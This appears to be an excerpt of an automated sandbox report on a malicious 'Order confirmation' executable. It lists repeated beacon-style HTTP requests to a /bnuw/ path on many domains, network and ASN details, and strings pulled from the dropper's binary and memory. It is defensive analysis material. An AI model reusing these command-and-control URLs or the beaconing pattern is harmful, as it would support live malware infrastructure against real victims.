          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=QSs7jQDeFsICiQBBJT3dneCSujMK1kRtf3DX2CBTXjaAl0pqu+ZlchGrg3MzDtdcBC8Q&VPXh=GhIH HTTP/1.1Host: www.brendonellis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=H9eFKPT3PZ6+JEukmol4IakM7Rn1bTYI7da3AQhEmZOTwtXfk4c4gWXfuc3t72SmU6ef&VPXh=GhIH HTTP/1.1Host: www.purposelyproductivelab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=oQBageEfQvQWJFAXW9y7EEMDG11e2WOjQsYBS6rJpmc3XwkvfF+/+ZMtoN/tAF1fT0AC&VPXh=GhIH HTTP/1.1Host: www.ekpays.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=1oU/nMap4AbjDp4r952Rm+RiaAFKzBneYu9/CIGQRHecOlg44QcSF3Ws3nwJMctl1pZ6&VPXh=GhIH HTTP/1.1Host: www.beachesvr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=XF767cEF5WeJAj2PNi54ASdTmj53lOUjuRZUhg8+4zo28WfhIPsVxcqM+IjYd/OTLsCZ&VPXh=GhIH HTTP/1.1Host: www.secretlairtoys.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=sBaVa8kj+YCbP3U2o3QVtpVj9pzNwi4112+9WTWVNa3X8ft1LfuComp0EF+DLQnGsCaK&VPXh=GhIH HTTP/1.1Host: www.dmvantalya.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=/+b+PR1HqbzITR/xPqvCXgD2JDomfeuYUy/NSf/Itxe+SMeGrZJLG9WamYt6TAOy7qnF&VPXh=GhIH HTTP/1.1Host: www.husum-ferienwohnungen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=ilxBzx5jzN5hMHP3lEnoWOla5UnSCnIEyVz4htafUXtg/D1GhDNvtcAOSSVsQdsK+0zz&VPXh=GhIH HTTP/1.1Host: www.swiftappliancessc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=UaN922MvMgW8WO4gu4dCtZfuQaKmG0MLXVbxDGTLVk691LjZJH+3nMRa/tXw417tQlSj&VPXh=GhIH HTTP/1.1Host: www.state728.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=msgcY/GKR2+7Ty9qVKTu9pnyQy/WbDn9v8bhS9H73S6U4m0FMdY0GWjCttMprcSB8tfS&VPXh=GhIH HTTP/1.1Host: www.taxandbookkeepingsolutions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=ZkQWQs3u/Pcsc6Be2UsBBupV9psrlEYt+FgoIT3sSBI7ln8n9R9tp98wLB1cQ9m1FW6z&VPXh=GhIH HTTP/1.1Host: www.rotalablog.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=9icL5DbtPB2as1Zd6Xg9EreNcG85hnBQd3Q23kTehbS+jnaTFoKfU18SI/G9uvH42aor&VPXh=GhIH HTTP/1.1Host: www.expand.careConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=mq8FdBnXvVD55s8LjK9FZEvCV1OO/e8xkuyico0eSbMj5rSpqU8yGo4yf+6JoC4UpbW1&VPXh=GhIH HTTP/1.1Host: www.alliswell.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=unzmywU5hP7O9pQ/VNJ9lipk3GER0gynknqK6ctL9m3B0ma88PcLaMbDy7KFiKVjmiKo&VPXh=GhIH HTTP/1.1Host: www.czb878.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=QSs7jQDeFsICiQBBJT3dneCSujMK1kRtf3DX2CBTXjaAl0pqu+ZlchGrg3MzDtdcBC8Q&VPXh=GhIH HTTP/1.1Host: www.brendonellis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=H9eFKPT3PZ6+JEukmol4IakM7Rn1bTYI7da3AQhEmZOTwtXfk4c4gWXfuc3t72SmU6ef&VPXh=GhIH HTTP/1.1Host: www.purposelyproductivelab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=oQBageEfQvQWJFAXW9y7EEMDG11e2WOjQsYBS6rJpmc3XwkvfF+/+ZMtoN/tAF1fT0AC&VPXh=GhIH HTTP/1.1Host: www.ekpays.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=1oU/nMap4AbjDp4r952Rm+RiaAFKzBneYu9/CIGQRHecOlg44QcSF3Ws3nwJMctl1pZ6&VPXh=GhIH HTTP/1.1Host: www.beachesvr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=XF767cEF5WeJAj2PNi54ASdTmj53lOUjuRZUhg8+4zo28WfhIPsVxcqM+IjYd/OTLsCZ&VPXh=GhIH HTTP/1.1Host: www.secretlairtoys.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=sBaVa8kj+YCbP3U2o3QVtpVj9pzNwi4112+9WTWVNa3X8ft1LfuComp0EF+DLQnGsCaK&VPXh=GhIH HTTP/1.1Host: www.dmvantalya.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=/+b+PR1HqbzITR/xPqvCXgD2JDomfeuYUy/NSf/Itxe+SMeGrZJLG9WamYt6TAOy7qnF&VPXh=GhIH HTTP/1.1Host: www.husum-ferienwohnungen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
          Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
          Source: Joe Sandbox ViewASN Name: IMH-WESTUS IMH-WESTUS
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00BA29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=msgcY/GKR2+7Ty9qVKTu9pnyQy/WbDn9v8bhS9H73S6U4m0FMdY0GWjCttMprcSB8tfS&VPXh=GhIH HTTP/1.1Host: www.taxandbookkeepingsolutions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=ZkQWQs3u/Pcsc6Be2UsBBupV9psrlEYt+FgoIT3sSBI7ln8n9R9tp98wLB1cQ9m1FW6z&VPXh=GhIH HTTP/1.1Host: www.rotalablog.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=9icL5DbtPB2as1Zd6Xg9EreNcG85hnBQd3Q23kTehbS+jnaTFoKfU18SI/G9uvH42aor&VPXh=GhIH HTTP/1.1Host: www.expand.careConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=mq8FdBnXvVD55s8LjK9FZEvCV1OO/e8xkuyico0eSbMj5rSpqU8yGo4yf+6JoC4UpbW1&VPXh=GhIH HTTP/1.1Host: www.alliswell.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=unzmywU5hP7O9pQ/VNJ9lipk3GER0gynknqK6ctL9m3B0ma88PcLaMbDy7KFiKVjmiKo&VPXh=GhIH HTTP/1.1Host: www.czb878.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=QSs7jQDeFsICiQBBJT3dneCSujMK1kRtf3DX2CBTXjaAl0pqu+ZlchGrg3MzDtdcBC8Q&VPXh=GhIH HTTP/1.1Host: www.brendonellis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=H9eFKPT3PZ6+JEukmol4IakM7Rn1bTYI7da3AQhEmZOTwtXfk4c4gWXfuc3t72SmU6ef&VPXh=GhIH HTTP/1.1Host: www.purposelyproductivelab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=oQBageEfQvQWJFAXW9y7EEMDG11e2WOjQsYBS6rJpmc3XwkvfF+/+ZMtoN/tAF1fT0AC&VPXh=GhIH HTTP/1.1Host: www.ekpays.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=1oU/nMap4AbjDp4r952Rm+RiaAFKzBneYu9/CIGQRHecOlg44QcSF3Ws3nwJMctl1pZ6&VPXh=GhIH HTTP/1.1Host: www.beachesvr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=XF767cEF5WeJAj2PNi54ASdTmj53lOUjuRZUhg8+4zo28WfhIPsVxcqM+IjYd/OTLsCZ&VPXh=GhIH HTTP/1.1Host: www.secretlairtoys.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=sBaVa8kj+YCbP3U2o3QVtpVj9pzNwi4112+9WTWVNa3X8ft1LfuComp0EF+DLQnGsCaK&VPXh=GhIH HTTP/1.1Host: www.dmvantalya.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=/+b+PR1HqbzITR/xPqvCXgD2JDomfeuYUy/NSf/Itxe+SMeGrZJLG9WamYt6TAOy7qnF&VPXh=GhIH HTTP/1.1Host: www.husum-ferienwohnungen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=ilxBzx5jzN5hMHP3lEnoWOla5UnSCnIEyVz4htafUXtg/D1GhDNvtcAOSSVsQdsK+0zz&VPXh=GhIH HTTP/1.1Host: www.swiftappliancessc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=UaN922MvMgW8WO4gu4dCtZfuQaKmG0MLXVbxDGTLVk691LjZJH+3nMRa/tXw417tQlSj&VPXh=GhIH HTTP/1.1Host: www.state728.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=msgcY/GKR2+7Ty9qVKTu9pnyQy/WbDn9v8bhS9H73S6U4m0FMdY0GWjCttMprcSB8tfS&VPXh=GhIH HTTP/1.1Host: www.taxandbookkeepingsolutions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=ZkQWQs3u/Pcsc6Be2UsBBupV9psrlEYt+FgoIT3sSBI7ln8n9R9tp98wLB1cQ9m1FW6z&VPXh=GhIH HTTP/1.1Host: www.rotalablog.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=9icL5DbtPB2as1Zd6Xg9EreNcG85hnBQd3Q23kTehbS+jnaTFoKfU18SI/G9uvH42aor&VPXh=GhIH HTTP/1.1Host: www.expand.careConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=mq8FdBnXvVD55s8LjK9FZEvCV1OO/e8xkuyico0eSbMj5rSpqU8yGo4yf+6JoC4UpbW1&VPXh=GhIH HTTP/1.1Host: www.alliswell.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=unzmywU5hP7O9pQ/VNJ9lipk3GER0gynknqK6ctL9m3B0ma88PcLaMbDy7KFiKVjmiKo&VPXh=GhIH HTTP/1.1Host: www.czb878.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=QSs7jQDeFsICiQBBJT3dneCSujMK1kRtf3DX2CBTXjaAl0pqu+ZlchGrg3MzDtdcBC8Q&VPXh=GhIH HTTP/1.1Host: www.brendonellis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=H9eFKPT3PZ6+JEukmol4IakM7Rn1bTYI7da3AQhEmZOTwtXfk4c4gWXfuc3t72SmU6ef&VPXh=GhIH HTTP/1.1Host: www.purposelyproductivelab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=oQBageEfQvQWJFAXW9y7EEMDG11e2WOjQsYBS6rJpmc3XwkvfF+/+ZMtoN/tAF1fT0AC&VPXh=GhIH HTTP/1.1Host: www.ekpays.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=1oU/nMap4AbjDp4r952Rm+RiaAFKzBneYu9/CIGQRHecOlg44QcSF3Ws3nwJMctl1pZ6&VPXh=GhIH HTTP/1.1Host: www.beachesvr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=XF767cEF5WeJAj2PNi54ASdTmj53lOUjuRZUhg8+4zo28WfhIPsVxcqM+IjYd/OTLsCZ&VPXh=GhIH HTTP/1.1Host: www.secretlairtoys.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=sBaVa8kj+YCbP3U2o3QVtpVj9pzNwi4112+9WTWVNa3X8ft1LfuComp0EF+DLQnGsCaK&VPXh=GhIH HTTP/1.1Host: www.dmvantalya.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bnuw/?Mv0h=/+b+PR1HqbzITR/xPqvCXgD2JDomfeuYUy/NSf/Itxe+SMeGrZJLG9WamYt6TAOy7qnF&VPXh=GhIH HTTP/1.1Host: www.husum-ferienwohnungen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.coredigit.net
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 27 Jan 2021 14:40:57 GMTContent-Type: text/htmlContent-Length: 1039Connection: closeVary: Accept-EncodingLast-Modified: Tue, 24 Feb 2015 16:29:52 GMTETag: "40f-50fd8074406b0"Accept-Ranges: bytesData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 42 41 53 45 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 22 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 3c 2f 42 41 53 45 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 64 6f 63 75 6d 65 6e 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 57 65 62 20 53 65 72 76 65 72 20 61 74 20 77 65 62 31 32 32 2e 73 65 72 76 65 72 30 31 2e 66 72 75 69 74 6d 65 64 69 61 2e 64 65 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69
          Source: Order confirmation 64236000000025 26.01.2021.exe, 00000000.00000002.259983047.00000000027B2000.00000004.00000001.sdmp, lqqebhptsg.exe, 00000001.00000002.256308291.0000000004EB3000.00000004.00000001.sdmp, nsmE343.tmp.0.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
          Source: Order confirmation 64236000000025 26.01.2021.exe, 00000000.00000002.259983047.00000000027B2000.00000004.00000001.sdmp, lqqebhptsg.exe, 00000001.00000002.256308291.0000000004EB3000.00000004.00000001.sdmp, nsmE343.tmp.0.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
          Source: Order confirmation 64236000000025 26.01.2021.exe, 00000000.00000002.259983047.00000000027B2000.00000004.00000001.sdmp, lqqebhptsg.exe, 00000001.00000002.256308291.0000000004EB3000.00000004.00000001.sdmp, nsmE343.tmp.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
          Source: Order confirmation 64236000000025 26.01.2021.exe, 00000000.00000002.259983047.00000000027B2000.00000004.00000001.sdmp, lqqebhptsg.exe, 00000001.00000002.256308291.0000000004EB3000.00000004.00000001.sdmp, nsmE343.tmp.0.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Order confirmation 64236000000025 26.01.2021.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: Order confirmation 64236000000025 26.01.2021.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: Order confirmation 64236000000025 26.01.2021.exe, 00000000.00000002.259983047.00000000027B2000.00000004.00000001.sdmp, lqqebhptsg.exe, 00000001.00000002.256308291.0000000004EB3000.00000004.00000001.sdmp, nsmE343.tmp.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
          Source: Order confirmation 64236000000025 26.01.2021.exe, 00000000.00000002.259983047.00000000027B2000.00000004.00000001.sdmp, lqqebhptsg.exe, 00000001.00000002.256308291.0000000004EB3000.00000004.00000001.sdmp, nsmE343.tmp.0.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
          Source: Order confirmation 64236000000025 26.01.2021.exe, 00000000.00000002.259983047.00000000027B2000.00000004.00000001.sdmp, lqqebhptsg.exe, 00000001.00000002.256308291.0000000004EB3000.00000004.00000001.sdmp, nsmE343.tmp.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
          Source: Order confirmation 64236000000025 26.01.2021.exe, 00000000.00000002.259983047.00000000027B2000.00000004.00000001.sdmp, lqqebhptsg.exe, 00000001.00000002.256308291.0000000004EB3000.00000004.00000001.sdmp, nsmE343.tmp.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
          Source: Order confirmation 64236000000025 26.01.2021.exe, 00000000.00000002.259983047.00000000027B2000.00000004.00000001.sdmp, lqqebhptsg.exe, 00000001.00000002.256308291.0000000004EB3000.00000004.00000001.sdmp, nsmE343.tmp.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Order confirmation 64236000000025 26.01.2021.exe, 00000000.00000002.259983047.00000000027B2000.00000004.00000001.sdmp, lqqebhptsg.exe, 00000001.00000002.251790831.0000000000BF9000.00000002.00020000.sdmp, 9rd1hxro.exe, 00000002.00000000.242920067.00000000004C9000.00000002.00020000.sdmp, NETSTAT.EXE, 0000000C.00000002.628385609.0000000003B1B000.00000004.00000001.sdmp, 9rd1hxro.exe.1.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: NETSTAT.EXE, 0000000C.00000002.628447437.0000000003BD2000.00000004.00000001.sdmpString found in binary or memory: http://www.secretlairtoys.com/
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.275348832.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: NETSTAT.EXE, 0000000C.00000002.628447437.0000000003BD2000.00000004.00000001.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/drift-zoom/1.4.0/drift-basic.min.css
          Source: NETSTAT.EXE, 0000000C.00000002.628447437.0000000003BD2000.00000004.00000001.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/lightgallery/1.7.3/css/lightgallery.min.css
          Source: NETSTAT.EXE, 0000000C.00000002.628447437.0000000003BD2000.00000004.00000001.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/noUiSlider/14.6.1/nouislider.min.css
          Source: NETSTAT.EXE, 0000000C.00000002.628447437.0000000003BD2000.00000004.00000001.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/simplebar/2.5.0/simplebar.min.css
          Source: NETSTAT.EXE, 0000000C.00000002.628447437.0000000003BD2000.00000004.00000001.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/tiny-slider/2.9.2/tiny-slider.css
          Source: Order confirmation 64236000000025 26.01.2021.exe, 00000000.00000002.259983047.00000000027B2000.00000004.00000001.sdmp, lqqebhptsg.exe, 00000001.00000002.256308291.0000000004EB3000.00000004.00000001.sdmp, nsmE343.tmp.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
          Source: NETSTAT.EXE, 0000000C.00000002.628447437.0000000003BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.brendonellis.com/bnuw/?Mv0h=QSs7jQDeFsICiQBBJT3dneCSujMK1kRtf3DX2CBTXjaAl0pqu
          Source: NETSTAT.EXE, 0000000C.00000002.628447437.0000000003BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.expand.care/bnuw/?Mv0h=9icL5DbtPB2as1Zd6Xg9EreNcG85hnBQd3Q23kTehbS
          Source: nsmE343.tmp.0.drString found in binary or memory: https://www.globalsign.com/repository/0
          Source: Order confirmation 64236000000025 26.01.2021.exe, 00000000.00000002.259983047.00000000027B2000.00000004.00000001.sdmp, lqqebhptsg.exe, 00000001.00000002.256308291.0000000004EB3000.00000004.00000001.sdmp, nsmE343.tmp.0.drString found in binary or memory: https://www.globalsign.com/repository/06
